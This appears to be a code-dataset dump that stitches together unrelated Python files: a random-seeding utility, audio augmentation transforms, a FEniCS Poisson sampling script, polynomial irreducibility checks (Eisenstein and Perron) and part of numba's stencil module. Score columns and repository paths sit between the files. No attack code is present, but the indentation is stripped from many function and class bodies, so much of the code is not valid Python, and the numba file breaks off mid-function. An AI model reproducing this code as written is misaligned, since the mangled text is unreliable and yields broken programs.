#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import hashlib
import numpy as np
import os
import struct
color2num = dict(gray=30, red=31, green=32, yellow=33,
                 blue=34, magenta=35, cyan=36, white=37, crimson=38)
def colorize(string, color, bold=False, highlight = False):
"""Return string surrounded by appropriate terminal color codes to
print colorized text. Valid colors: gray, red, green, yellow,
blue, magenta, cyan, white, crimson
"""
attr = []
num = color2num[color]
if highlight: num += 10
attr.append(str(num))
if bold: attr.append('1')
attrs = ';'.join(attr)
return '\x1b[%sm%s\x1b[0m' % (attrs, string)
def error(msg, *args):
print(colorize('%s: %s'%('ERROR', msg % args), 'red'))
def np_random(seed=None):
if seed is not None and not (isinstance(seed, int) and 0 <= seed):
        raise ValueError('Seed must be a non-negative integer or omitted, not {}'.format(seed))
seed = create_seed(seed)
rng = np.random.RandomState()
rng.seed(_int_list_from_bigint(hash_seed(seed)))
return rng, seed
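def _example_np_random_usage():
    # Usage sketch: the same seed yields identical draws, so runs are reproducible.
    rng, seed = np_random(42)
    return rng.randint(0, 52, size=5), seed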
def hash_seed(seed=None, max_bytes=8):
"""Any given evaluation is likely to have many PRNG's active at
once. (Most commonly, because the environment is running in
multiple processes.) There's literature indicating that having
linear correlations between seeds of multiple PRNG's can correlate
the outputs:
http://blogs.unity3d.com/2015/01/07/a-primer-on-repeatable-random-numbers/
http://stackoverflow.com/questions/1554958/how-different-do-random-seeds-need-to-be
http://dl.acm.org/citation.cfm?id=1276928
Thus, for sanity we hash the seeds before using them. (This scheme
is likely not crypto-strength, but it should be good enough to get
rid of simple correlations.)
Args:
seed (Optional[int]): None seeds from an operating system specific randomness source.
max_bytes: Maximum number of bytes to use in the hashed seed.
"""
if seed is None:
seed = create_seed(max_bytes=max_bytes)
hash = hashlib.sha512(str(seed).encode('utf8')).digest()
return _bigint_from_bytes(hash[:max_bytes])
def create_seed(a=None, max_bytes=8):
"""Create a strong random seed. Otherwise, Python 2 would seed using
the system time, which might be non-robust especially in the
presence of concurrency.
Args:
a (Optional[int, str]): None seeds from an operating system specific randomness source.
max_bytes: Maximum number of bytes to use in the seed.
"""
# Adapted from https://svn.python.org/projects/python/tags/r32/Lib/random.py
if a is None:
a = _bigint_from_bytes(os.urandom(max_bytes))
elif isinstance(a, str):
a = a.encode('utf8')
a += hashlib.sha512(a).digest()
a = _bigint_from_bytes(a[:max_bytes])
elif isinstance(a, int):
a = a % 2**(8 * max_bytes)
else:
        raise ValueError('Invalid type for seed: {} ({})'.format(type(a), a))
return a
# TODO: don't hardcode sizeof_int here
def _bigint_from_bytes(bytes):
sizeof_int = 4
padding = sizeof_int - len(bytes) % sizeof_int
bytes += b'\0' * padding
int_count = int(len(bytes) / sizeof_int)
unpacked = struct.unpack("{}I".format(int_count), bytes)
accum = 0
for i, val in enumerate(unpacked):
accum += 2 ** (sizeof_int * 8 * i) * val
return accum
def _int_list_from_bigint(bigint):
# Special case 0
if bigint < 0:
        raise ValueError('Seed must be non-negative, not {}'.format(bigint))
elif bigint == 0:
return [0]
ints = []
while bigint > 0:
bigint, mod = divmod(bigint, 2 ** 32)
ints.append(mod)
return ints
| 2.28125 | 2 |
ops/transforms.py | ex4sperans/freesound-classification | 55 | 4956 | import random
import math
from functools import partial
import json
import pysndfx
import librosa
import numpy as np
import torch
from ops.audio import (
read_audio, compute_stft, trim_audio, mix_audio_and_labels,
shuffle_audio, cutout
)
SAMPLE_RATE = 44100
class Augmentation:
"""A base class for data augmentation transforms"""
pass
class MapLabels:
def __init__(self, class_map, drop_raw=True):
self.class_map = class_map
def __call__(self, dataset, **inputs):
labels = np.zeros(len(self.class_map), dtype=np.float32)
for c in inputs["raw_labels"]:
labels[self.class_map[c]] = 1.0
transformed = dict(inputs)
transformed["labels"] = labels
transformed.pop("raw_labels")
return transformed
class MixUp(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
first_audio, first_labels = inputs["audio"], inputs["labels"]
random_sample = dataset.random_clean_sample()
new_audio, new_labels = mix_audio_and_labels(
first_audio, random_sample["audio"],
first_labels, random_sample["labels"]
)
transformed["audio"] = new_audio
transformed["labels"] = new_labels
return transformed
class FlipAudio(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = np.flipud(inputs["audio"])
return transformed
class AudioAugmentation(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
effects_chain = (
pysndfx.AudioEffectsChain()
.reverb(
reverberance=random.randrange(50),
room_scale=random.randrange(50),
stereo_depth=random.randrange(50)
)
.pitch(shift=random.randrange(-300, 300))
.overdrive(gain=random.randrange(2, 10))
.speed(random.uniform(0.9, 1.1))
)
transformed["audio"] = effects_chain(inputs["audio"])
return transformed
class LoadAudio:
def __init__(self):
pass
def __call__(self, dataset, **inputs):
audio, sr = read_audio(inputs["filename"])
transformed = dict(inputs)
transformed["audio"] = audio
transformed["sr"] = sr
return transformed
class STFT:
eps = 1e-4
def __init__(self, n_fft, hop_size):
self.n_fft = n_fft
self.hop_size = hop_size
def __call__(self, dataset, **inputs):
stft = compute_stft(
inputs["audio"],
window_size=self.n_fft, hop_size=self.hop_size,
eps=self.eps)
transformed = dict(inputs)
transformed["stft"] = np.transpose(stft)
return transformed
class AudioFeatures:
eps = 1e-4
def __init__(self, descriptor, verbose=True):
name, *args = descriptor.split("_")
self.feature_type = name
if name == "stft":
n_fft, hop_size = args
self.n_fft = int(n_fft)
self.hop_size = int(hop_size)
self.n_features = self.n_fft // 2 + 1
self.padding_value = 0.0
if verbose:
print(
"\nUsing STFT features with params:\n",
"n_fft: {}, hop_size: {}".format(
n_fft, hop_size
)
)
elif name == "mel":
n_fft, hop_size, n_mel = args
self.n_fft = int(n_fft)
self.hop_size = int(hop_size)
self.n_mel = int(n_mel)
self.n_features = self.n_mel
self.padding_value = 0.0
if verbose:
print(
"\nUsing mel features with params:\n",
"n_fft: {}, hop_size: {}, n_mel: {}".format(
n_fft, hop_size, n_mel
)
)
elif name == "raw":
self.n_features = 1
self.padding_value = 0.0
if verbose:
print(
"\nUsing raw waveform features."
)
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if self.feature_type == "stft":
# stft = compute_stft(
# inputs["audio"],
# window_size=self.n_fft, hop_size=self.hop_size,
# eps=self.eps, log=True
# )
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
elif self.feature_type == "mel":
stft = compute_stft(
inputs["audio"],
window_size=self.n_fft, hop_size=self.hop_size,
eps=self.eps, log=False
)
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
elif self.feature_type == "raw":
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
return transformed
class SampleSegment(Augmentation):
def __init__(self, ratio=(0.3, 0.9), p=1.0):
self.min, self.max = ratio
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
original_size = inputs["audio"].size
target_size = int(np.random.uniform(self.min, self.max) * original_size)
start = np.random.randint(original_size - target_size - 1)
transformed["audio"] = inputs["audio"][start:start+target_size]
return transformed
class ShuffleAudio(Augmentation):
def __init__(self, chunk_length=0.5, p=0.5):
self.chunk_length = chunk_length
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = shuffle_audio(
transformed["audio"], self.chunk_length, sr=transformed["sr"])
return transformed
class CutOut(Augmentation):
def __init__(self, area=0.25, p=0.5):
self.area = area
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = cutout(
transformed["audio"], self.area)
return transformed
class SampleLongAudio:
def __init__(self, max_length):
self.max_length = max_length
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if (inputs["audio"].size / inputs["sr"]) > self.max_length:
max_length = self.max_length * inputs["sr"]
start = np.random.randint(0, inputs["audio"].size - max_length)
transformed["audio"] = inputs["audio"][start:start+max_length]
return transformed
class OneOf:
def __init__(self, transforms):
self.transforms = transforms
def __call__(self, dataset, **inputs):
transform = random.choice(self.transforms)
        return transform(dataset=dataset, **inputs)
class DropFields:
def __init__(self, fields):
self.to_drop = fields
def __call__(self, dataset, **inputs):
transformed = dict()
for name, input in inputs.items():
if not name in self.to_drop:
transformed[name] = input
return transformed
class RenameFields:
def __init__(self, mapping):
self.mapping = mapping
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
for old, new in self.mapping.items():
transformed[new] = transformed.pop(old)
return transformed
class Compose:
def __init__(self, transforms):
self.transforms = transforms
def switch_off_augmentations(self):
for t in self.transforms:
if isinstance(t, Augmentation):
t.p = 0.0
def __call__(self, dataset=None, **inputs):
for t in self.transforms:
inputs = t(dataset=dataset, **inputs)
return inputs
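def _example_training_pipeline(class_map):
    # Usage sketch (hypothetical class map and feature descriptor; shows how the
    # transforms above are typically chained for training).
    # A pipeline built this way is invoked as pipeline(dataset=dataset, **sample).
    return Compose([
        LoadAudio(),
        SampleLongAudio(max_length=10),
        MapLabels(class_map=class_map),
        MixUp(p=0.5),
        AudioFeatures("mel_2048_512_64", verbose=False),
        DropFields(("audio", "filename", "sr")),
    ])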
class Identity:
def __call__(self, dataset=None, **inputs):
        return inputs
 | 2.421875 | 2 |
figures/pp.py | mathematicalmichael/thesis | 6 | 4957 | #!/usr/env/bin python
import os
# os.environ['OMP_NUM_THREADS'] = '1'
from newpoisson import poisson
import numpy as np
from fenics import set_log_level, File, RectangleMesh, Point
mesh = RectangleMesh(Point(0,0), Point(1,1), 36, 36)
# comm = mesh.mpi_comm()
set_log_level(40) # ERROR=40
# from mpi4py import MPI
# comm = MPI.COMM_WORLD
# rank = comm.Get_rank()
if __name__=='__main__':
import argparse
parser = argparse.ArgumentParser(description="Poisson Problem")
parser.add_argument('-n', '--num', default = 10, type=int,
help="Number of samples")
parser.add_argument('-o', '--outfile', default='results',
help="Output filename (no extension)")
parser.add_argument('-i', '--input-dim', default=1, type=int)
parser.add_argument('-d', '--dist', default='u', help='Distribution. `n` (normal), `u` (uniform, default)')
args = parser.parse_args()
num_samples = args.num
dist = args.dist
outfile = args.outfile.replace('.pkl','')
inputdim = args.input_dim
if inputdim == 1: # U[1,5]
randsamples = 1 + 4*np.random.rand(num_samples)
    else: # higher-dimensional input: N(0,1) or U(-4,0) depending on --dist
if dist == 'n':
randsamples = np.random.randn(num_samples, inputdim)
elif dist == 'u':
randsamples = -4*np.random.rand(num_samples, inputdim)
else:
raise ValueError("Improper distribution choice, use `n` (normal), `u` (uniform)")
sample_seed_list = list(zip(range(num_samples), randsamples))
def wrapper(sample, outfile):
g=sample[1]
u = poisson(gamma=g, mesh=mesh)
# Save solution
fname = f"{outfile}-data/poisson-{int(sample[0]):06d}.xml"
File(fname, 'w') << u
return {int(sample[0]): {'u': fname, 'gamma': sample[1]}}
results = []
for sample in sample_seed_list:
r = wrapper(sample, outfile)
results.append(r)
# print(results)
import pickle
pickle.dump(results, open(f'{outfile}.pkl','wb'))
| 2.4375 | 2 |
additions/irreducible_check.py | kluhan/seraphim | 0 | 4958 | """
Irreducibility criteria
Implemented are the Eisenstein and the Perron criterion
Sources:
https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
Polynomials of type Polynomial are passed in, not plain lists of coefficients
"""
import logging
import helper
import itertools
def factor(n):
    # Factorization of a number n
i = 0
factors = []
for i in range(1, n + 1):
if n % i == 0:
factors.append(i)
return factors
def prime_factor(n):
    # Prime factorization of a number n
i = 2
factors = []
while i * i <= n:
if n % i:
i += 1
else:
n //= i
factors.append(i)
if n > 1:
factors.append(n)
return factors
# recursive implementation of HCF
def hcf(x, y):
"""Highest common factor"""
if y == 0:
return x
else:
return hcf(y, x % y)
def is_polynomial_coprime(polynomial):
"""Überprüft, ob ein Polynom teilerfremd (coprime) ist"""
non_zero_polynomial = [
i for i in polynomial.coefficients if i != 0
    ] # zeros would distort the result of HCF
if polynomial.degree() == 0:
return True
for x, y in itertools.combinations(non_zero_polynomial, 2):
if hcf(x, y) != 1:
return False
return True
# Source: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
def is_irreducible_perron(polynomial):
"""
    Checks a polynomial for irreducibility (Perron).
    Does not work for a leading coefficient != 1.
    No statement possible if the second-to-last coefficient is smaller than the absolute sum of the remaining coefficients
"""
if polynomial.degree() < 0:
return logging.error("Polynom ungültig")
const_coefficient = polynomial.coefficients[0]
if const_coefficient == 0:
return 0
lead_coefficient = polynomial.coefficients[polynomial.degree()]
assert lead_coefficient == 1
nm1_coefficient = abs(polynomial.coefficients[polynomial.degree() - 1])
total = 1
i = 0
for coeff in polynomial.coefficients:
if i < polynomial.degree() - 1:
total += abs(coeff)
i = i + 1
if nm1_coefficient > total:
return 1
return 2
# Sources: https://www.uni-frankfurt.de/81429607/Stix_Algebra_SkriptWS2016_17.pdf
# http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
def is_irreducible_eisenstein(polynomial):
"""
    An implementation of the Eisenstein criterion.
    """
    # The polynomial must have a degree m >= 1
    if polynomial.degree() < 1:
        return 2
    # Eisenstein requires coprime coefficients
    if not helper.is_polynomial_coprime(polynomial):
        return 2
    # Check whether there is a prime that divides all coefficients of the polynomial up to degree m - 1. p^2 must not divide a0
    const_coeff = polynomial.coefficients[0]
    if const_coeff == 0:
        return 0
    # Get the prime factorization of the constant to obtain a base set of primes
    prime_factors = helper.prime_factor(const_coeff)
    for p in prime_factors:
        if (
            const_coeff % pow(p, 2) == 0
        ):  # if p^2 divides the constant coefficient, no statement can be made
            return 2
        for coeff in polynomial.coefficients[0 : polynomial.degree()]:
            if coeff % p != 0:
                return 2  # if the prime does not divide the coefficient, no statement can be made
return 1
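def _example_irreducibility_checks(polynomial_cls):
    # Usage sketch (hypothetical constructor): polynomial_cls is assumed to build a
    # Polynomial from coefficients in ascending order, e.g. [2, 5, 1] == x^2 + 5x + 2.
    # Perron: |5| > 1 + |2|, so the check returns 1 (irreducible).
    perron = is_irreducible_perron(polynomial_cls([2, 5, 1]))
    # Eisenstein with p = 2 on x^2 + 2: 2 divides 0 and 2, but 4 does not divide 2,
    # so the check returns 1 (irreducible).
    eisenstein = is_irreducible_eisenstein(polynomial_cls([2, 0, 1]))
    return perron, eisenstein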
| 2.890625 | 3 |
numba/stencils/stencil.py | auderson/numba | 6,620 | 4959 | <reponame>auderson/numba<filename>numba/stencils/stencil.py<gh_stars>1000+
#
# Copyright (c) 2017 Intel Corporation
# SPDX-License-Identifier: BSD-2-Clause
#
import copy
import numpy as np
from llvmlite import ir as lir
from numba.core import types, typing, utils, ir, config, ir_utils, registry
from numba.core.typing.templates import (CallableTemplate, signature,
infer_global, AbstractTemplate)
from numba.core.imputils import lower_builtin
from numba.core.extending import register_jitable
from numba.core.errors import NumbaValueError
from numba.misc.special import literal_unroll
import numba
import operator
from numba.np import numpy_support
class StencilFuncLowerer(object):
'''Callable class responsible for lowering calls to a specific StencilFunc.
'''
def __init__(self, sf):
self.stencilFunc = sf
def __call__(self, context, builder, sig, args):
cres = self.stencilFunc.compile_for_argtys(sig.args, {},
sig.return_type, None)
res = context.call_internal(builder, cres.fndesc, sig, args)
context.add_linking_libs([cres.library])
return res
@register_jitable
def raise_if_incompatible_array_sizes(a, *args):
ashape = a.shape
# We need literal_unroll here because the stencil might take
# multiple input arrays with different types that are not compatible
# (e.g. values as float[:] and flags as bool[:])
# When more than three total arrays are given, the second and third
# are iterated over in the loop below. Without literal_unroll, their
# types have to match.
# An example failing signature without literal_unroll might be
# (float[:], float[:], bool[:]) (Just (float[:], bool[:]) wouldn't fail)
for arg in literal_unroll(args):
if a.ndim != arg.ndim:
raise ValueError("Secondary stencil array does not have same number "
" of dimensions as the first stencil input.")
argshape = arg.shape
for i in range(len(ashape)):
if ashape[i] > argshape[i]:
raise ValueError("Secondary stencil array has some dimension "
"smaller the same dimension in the first "
"stencil input.")
def slice_addition(the_slice, addend):
""" Called by stencil in Python mode to add the loop index to a
user-specified slice.
"""
return slice(the_slice.start + addend, the_slice.stop + addend)
class StencilFunc(object):
"""
A special type to hold stencil information for the IR.
"""
id_counter = 0
def __init__(self, kernel_ir, mode, options):
self.id = type(self).id_counter
type(self).id_counter += 1
self.kernel_ir = kernel_ir
self.mode = mode
self.options = options
self.kws = [] # remember original kws arguments
# stencils only supported for CPU context currently
self._typingctx = registry.cpu_target.typing_context
self._targetctx = registry.cpu_target.target_context
self._typingctx.refresh()
self._targetctx.refresh()
self._install_type(self._typingctx)
self.neighborhood = self.options.get("neighborhood")
self._type_cache = {}
self._lower_me = StencilFuncLowerer(self)
def replace_return_with_setitem(self, blocks, index_vars, out_name):
"""
Find return statements in the IR and replace them with a SetItem
call of the value "returned" by the kernel into the result array.
Returns the block labels that contained return statements.
"""
ret_blocks = []
for label, block in blocks.items():
scope = block.scope
loc = block.loc
new_body = []
for stmt in block.body:
if isinstance(stmt, ir.Return):
ret_blocks.append(label)
# If 1D array then avoid the tuple construction.
if len(index_vars) == 1:
rvar = ir.Var(scope, out_name, loc)
ivar = ir.Var(scope, index_vars[0], loc)
new_body.append(ir.SetItem(rvar, ivar, stmt.value, loc))
else:
# Convert the string names of the index variables into
# ir.Var's.
var_index_vars = []
for one_var in index_vars:
index_var = ir.Var(scope, one_var, loc)
var_index_vars += [index_var]
s_index_name = ir_utils.mk_unique_var("stencil_index")
s_index_var = ir.Var(scope, s_index_name, loc)
# Build a tuple from the index ir.Var's.
tuple_call = ir.Expr.build_tuple(var_index_vars, loc)
new_body.append(ir.Assign(tuple_call, s_index_var, loc))
rvar = ir.Var(scope, out_name, loc)
# Write the return statements original value into
# the array using the tuple index.
si = ir.SetItem(rvar, s_index_var, stmt.value, loc)
new_body.append(si)
else:
new_body.append(stmt)
block.body = new_body
return ret_blocks
def add_indices_to_kernel(self, kernel, index_names, ndim,
neighborhood, standard_indexed, typemap, calltypes):
"""
Transforms the stencil kernel as specified by the user into one
that includes each dimension's index variable as part of the getitem
calls. So, in effect array[-1] becomes array[index0-1].
"""
const_dict = {}
kernel_consts = []
if config.DEBUG_ARRAY_OPT >= 1:
print("add_indices_to_kernel", ndim, neighborhood)
ir_utils.dump_blocks(kernel.blocks)
if neighborhood is None:
need_to_calc_kernel = True
else:
need_to_calc_kernel = False
if len(neighborhood) != ndim:
raise ValueError("%d dimensional neighborhood specified for %d " \
"dimensional input array" % (len(neighborhood), ndim))
tuple_table = ir_utils.get_tuple_table(kernel.blocks)
relatively_indexed = set()
for block in kernel.blocks.values():
scope = block.scope
loc = block.loc
new_body = []
for stmt in block.body:
if (isinstance(stmt, ir.Assign) and
isinstance(stmt.value, ir.Const)):
if config.DEBUG_ARRAY_OPT >= 1:
print("remembering in const_dict", stmt.target.name,
stmt.value.value)
# Remember consts for use later.
const_dict[stmt.target.name] = stmt.value.value
if ((isinstance(stmt, ir.Assign)
and isinstance(stmt.value, ir.Expr)
and stmt.value.op in ['setitem', 'static_setitem']
and stmt.value.value.name in kernel.arg_names) or
(isinstance(stmt, ir.SetItem)
and stmt.target.name in kernel.arg_names)):
raise ValueError("Assignments to arrays passed to stencil " \
"kernels is not allowed.")
if (isinstance(stmt, ir.Assign)
and isinstance(stmt.value, ir.Expr)
and stmt.value.op in ['getitem', 'static_getitem']
and stmt.value.value.name in kernel.arg_names
and stmt.value.value.name not in standard_indexed):
# We found a getitem from the input array.
if stmt.value.op == 'getitem':
stmt_index_var = stmt.value.index
else:
stmt_index_var = stmt.value.index_var
# allow static_getitem since rewrite passes are applied
#raise ValueError("Unexpected static_getitem in add_indices_to_kernel.")
relatively_indexed.add(stmt.value.value.name)
# Store the index used after looking up the variable in
# the const dictionary.
if need_to_calc_kernel:
assert hasattr(stmt_index_var, 'name')
if stmt_index_var.name in tuple_table:
kernel_consts += [tuple_table[stmt_index_var.name]]
elif stmt_index_var.name in const_dict:
kernel_consts += [const_dict[stmt_index_var.name]]
else:
raise NumbaValueError("stencil kernel index is not "
"constant, 'neighborhood' option required")
if ndim == 1:
# Single dimension always has index variable 'index0'.
# tmpvar will hold the real index and is computed by
# adding the relative offset in stmt.value.index to
# the current absolute location in index0.
index_var = ir.Var(scope, index_names[0], loc)
tmpname = ir_utils.mk_unique_var("stencil_index")
tmpvar = ir.Var(scope, tmpname, loc)
stmt_index_var_typ = typemap[stmt_index_var.name]
# If the array is indexed with a slice then we
# have to add the index value with a call to
# slice_addition.
if isinstance(stmt_index_var_typ, types.misc.SliceType):
sa_var = ir.Var(scope, ir_utils.mk_unique_var("slice_addition"), loc)
sa_func = numba.njit(slice_addition)
sa_func_typ = types.functions.Dispatcher(sa_func)
typemap[sa_var.name] = sa_func_typ
g_sa = ir.Global("slice_addition", sa_func, loc)
new_body.append(ir.Assign(g_sa, sa_var, loc))
slice_addition_call = ir.Expr.call(sa_var, [stmt_index_var, index_var], (), loc)
calltypes[slice_addition_call] = sa_func_typ.get_call_type(self._typingctx, [stmt_index_var_typ, types.intp], {})
new_body.append(ir.Assign(slice_addition_call, tmpvar, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value, tmpvar, loc),
stmt.target, loc))
else:
acc_call = ir.Expr.binop(operator.add, stmt_index_var,
index_var, loc)
new_body.append(ir.Assign(acc_call, tmpvar, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value, tmpvar, loc),
stmt.target, loc))
else:
index_vars = []
sum_results = []
s_index_name = ir_utils.mk_unique_var("stencil_index")
s_index_var = ir.Var(scope, s_index_name, loc)
const_index_vars = []
ind_stencils = []
stmt_index_var_typ = typemap[stmt_index_var.name]
# Same idea as above but you have to extract
# individual elements out of the tuple indexing
# expression and add the corresponding index variable
# to them and then reconstitute as a tuple that can
# index the array.
for dim in range(ndim):
tmpname = ir_utils.mk_unique_var("const_index")
tmpvar = ir.Var(scope, tmpname, loc)
new_body.append(ir.Assign(ir.Const(dim, loc),
tmpvar, loc))
const_index_vars += [tmpvar]
index_var = ir.Var(scope, index_names[dim], loc)
index_vars += [index_var]
tmpname = ir_utils.mk_unique_var("ind_stencil_index")
tmpvar = ir.Var(scope, tmpname, loc)
ind_stencils += [tmpvar]
getitemname = ir_utils.mk_unique_var("getitem")
getitemvar = ir.Var(scope, getitemname, loc)
getitemcall = ir.Expr.getitem(stmt_index_var,
const_index_vars[dim], loc)
new_body.append(ir.Assign(getitemcall, getitemvar, loc))
# Get the type of this particular part of the index tuple.
if isinstance(stmt_index_var_typ, types.ConstSized):
one_index_typ = stmt_index_var_typ[dim]
else:
one_index_typ = stmt_index_var_typ[:]
# If the array is indexed with a slice then we
# have to add the index value with a call to
# slice_addition.
if isinstance(one_index_typ, types.misc.SliceType):
sa_var = ir.Var(scope, ir_utils.mk_unique_var("slice_addition"), loc)
sa_func = numba.njit(slice_addition)
sa_func_typ = types.functions.Dispatcher(sa_func)
typemap[sa_var.name] = sa_func_typ
g_sa = ir.Global("slice_addition", sa_func, loc)
new_body.append(ir.Assign(g_sa, sa_var, loc))
slice_addition_call = ir.Expr.call(sa_var, [getitemvar, index_vars[dim]], (), loc)
calltypes[slice_addition_call] = sa_func_typ.get_call_type(self._typingctx, [one_index_typ, types.intp], {})
new_body.append(ir.Assign(slice_addition_call, tmpvar, loc))
else:
acc_call = ir.Expr.binop(operator.add, getitemvar,
index_vars[dim], loc)
new_body.append(ir.Assign(acc_call, tmpvar, loc))
tuple_call = ir.Expr.build_tuple(ind_stencils, loc)
new_body.append(ir.Assign(tuple_call, s_index_var, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value,s_index_var,loc),
stmt.target,loc))
else:
new_body.append(stmt)
block.body = new_body
if need_to_calc_kernel:
# Find the size of the kernel by finding the maximum absolute value
# index used in the kernel specification.
neighborhood = [[0,0] for _ in range(ndim)]
if len(kernel_consts) == 0:
raise NumbaValueError("Stencil kernel with no accesses to "
"relatively indexed arrays.")
for index in kernel_consts:
if isinstance(index, tuple) or isinstance(index, list):
for i in range(len(index)):
te = index[i]
if isinstance(te, ir.Var) and te.name in const_dict:
te = const_dict[te.name]
if isinstance(te, int):
neighborhood[i][0] = min(neighborhood[i][0], te)
neighborhood[i][1] = max(neighborhood[i][1], te)
else:
raise NumbaValueError(
"stencil kernel index is not constant,"
"'neighborhood' option required")
index_len = len(index)
elif isinstance(index, int):
neighborhood[0][0] = min(neighborhood[0][0], index)
neighborhood[0][1] = max(neighborhood[0][1], index)
index_len = 1
else:
raise NumbaValueError(
"Non-tuple or non-integer used as stencil index.")
if index_len != ndim:
raise NumbaValueError(
"Stencil index does not match array dimensionality.")
return (neighborhood, relatively_indexed)
def get_return_type(self, argtys):
if config.DEBUG_ARRAY_OPT >= 1:
print("get_return_type", argtys)
ir_utils.dump_blocks(self.kernel_ir.blocks)
if not isinstance(argtys[0], types.npytypes.Array):
raise NumbaValueError("The first argument to a stencil kernel must "
"be the primary input array.")
from numba.core import typed_passes
typemap, return_type, calltypes, _ = typed_passes.type_inference_stage(
self._typingctx,
self._targetctx,
self.kernel_ir,
argtys,
None,
{})
if isinstance(return_type, types.npytypes.Array):
raise NumbaValueError(
"Stencil kernel must return a scalar and not a numpy array.")
real_ret = types.npytypes.Array(return_type, argtys[0].ndim,
argtys[0].layout)
return (real_ret, typemap, calltypes)
def _install_type(self, typingctx):
"""Constructs and installs a typing class for a StencilFunc object in
the input typing context.
"""
_ty_cls = type('StencilFuncTyping_' +
str(self.id),
(AbstractTemplate,),
dict(key=self, generic=self._type_me))
typingctx.insert_user_function(self, _ty_cls)
def compile_for_argtys(self, argtys, kwtys, return_type, sigret):
# look in the type cache to find if result array is passed
(_, result, typemap, calltypes) = self._type_cache[argtys]
new_func = self._stencil_wrapper(result, sigret, return_type,
typemap, calltypes, *argtys)
return new_func
def _type_me(self, argtys, kwtys):
"""
Implement AbstractTemplate.generic() for the typing class
built by StencilFunc._install_type().
Return the call-site signature.
"""
if (self.neighborhood is not None and
len(self.neighborhood) != argtys[0].ndim):
raise NumbaValueError("%d dimensional neighborhood specified "
"for %d dimensional input array" %
(len(self.neighborhood), argtys[0].ndim))
argtys_extra = argtys
sig_extra = ""
result = None
if 'out' in kwtys:
argtys_extra += (kwtys['out'],)
sig_extra += ", out=None"
result = kwtys['out']
if 'neighborhood' in kwtys:
argtys_extra += (kwtys['neighborhood'],)
sig_extra += ", neighborhood=None"
# look in the type cache first
if argtys_extra in self._type_cache:
(_sig, _, _, _) = self._type_cache[argtys_extra]
return _sig
(real_ret, typemap, calltypes) = self.get_return_type(argtys)
sig = signature(real_ret, *argtys_extra)
dummy_text = ("def __numba_dummy_stencil({}{}):\n pass\n".format(
",".join(self.kernel_ir.arg_names), sig_extra))
exec(dummy_text) in globals(), locals()
dummy_func = eval("__numba_dummy_stencil")
sig = sig.replace(pysig=utils.pysignature(dummy_func))
self._targetctx.insert_func_defn([(self._lower_me, self, argtys_extra)])
self._type_cache[argtys_extra] = (sig, result, typemap, calltypes)
return sig
def copy_ir_with_calltypes(self, ir, calltypes):
"""
Create a copy of a given IR along with its calltype information.
We need a copy of the calltypes because copy propagation applied
to the copied IR will change the calltypes and make subsequent
uses of the original IR invalid.
"""
copy_calltypes = {}
kernel_copy = ir.copy()
kernel_copy.blocks = {}
# For each block...
for (block_label, block) in ir.blocks.items():
new_block = copy.deepcopy(ir.blocks[block_label])
new_block.body = []
# For each statement in each block...
for stmt in ir.blocks[block_label].body:
# Copy the statement to the new copy of the kernel
# and if the original statement is in the original
# calltypes then add the type associated with this
# statement to the calltypes copy.
scopy = copy.deepcopy(stmt)
new_block.body.append(scopy)
if stmt in calltypes:
copy_calltypes[scopy] = calltypes[stmt]
kernel_copy.blocks[block_label] = new_block
return (kernel_copy, copy_calltypes)
def _stencil_wrapper(self, result, sigret, return_type, typemap, calltypes, *args):
# Overall approach:
# 1) Construct a string containing a function definition for the stencil function
# that will execute the stencil kernel. This function definition includes a
# unique stencil function name, the parameters to the stencil kernel, loop
# nests across the dimensions of the input array. Those loop nests use the
# computed stencil kernel size so as not to try to compute elements where
# elements outside the bounds of the input array would be needed.
        # 2) The body of the loop nest in this new function is a special sentinel
# assignment.
# 3) Get the IR of this new function.
# 4) Split the block containing the sentinel assignment and remove the sentinel
# assignment. Insert the stencil kernel IR into the stencil function IR
# after label and variable renaming of the stencil kernel IR to prevent
# conflicts with the stencil function IR.
# 5) Compile the combined stencil function IR + stencil kernel IR into existence.
# Copy the kernel so that our changes for this callsite
        # won't affect other callsites.
(kernel_copy, copy_calltypes) = self.copy_ir_with_calltypes(
self.kernel_ir, calltypes)
# The stencil kernel body becomes the body of a loop, for which args aren't needed.
ir_utils.remove_args(kernel_copy.blocks)
first_arg = kernel_copy.arg_names[0]
in_cps, out_cps = ir_utils.copy_propagate(kernel_copy.blocks, typemap)
name_var_table = ir_utils.get_name_var_table(kernel_copy.blocks)
ir_utils.apply_copy_propagate(
kernel_copy.blocks,
in_cps,
name_var_table,
typemap,
copy_calltypes)
if "out" in name_var_table:
